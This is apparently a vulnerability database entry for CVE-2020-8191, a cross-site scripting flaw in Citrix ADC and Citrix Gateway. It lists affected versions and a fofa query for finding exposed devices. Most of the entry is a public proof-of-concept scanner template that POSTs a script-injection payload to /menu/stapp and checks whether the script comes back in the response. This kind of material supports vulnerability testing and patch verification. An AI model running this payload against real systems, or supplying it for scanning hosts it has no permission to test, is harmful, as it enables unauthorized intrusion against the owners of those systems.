CVE-2020-8191: citrix-cve-2020-8191-xss

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

Citrix ADC and Citrix Gateway 13.0 before 13.0-65.13, 12.1 before 12.1-55.13, 12.0 before 12.0-65.13, and 11.1 before 11.1-65.13 contain a cross-site scripting vulnerability. fofa: "Citrix ADC"

PoC code [public]

id: CVE-2020-8191

info:
  name: citrix-cve-2020-8191-xss
  author: JingLing
  severity: medium
  description: |-
    Citrix ADC and Citrix Gateway 13.0 before 13.0-65.13, 12.1 before 12.1-55.13, 12.0 before 12.0-65.13, and 11.1 before 11.1-65.13 contain a cross-site scripting vulnerability.
    fofa: "Citrix ADC"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
  tags: cve,cve2020,citrix,xss
  created: 2023/08/17

set:
  r1: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /menu/stapp
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
      follow_redirects: true
    expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
expression: r0()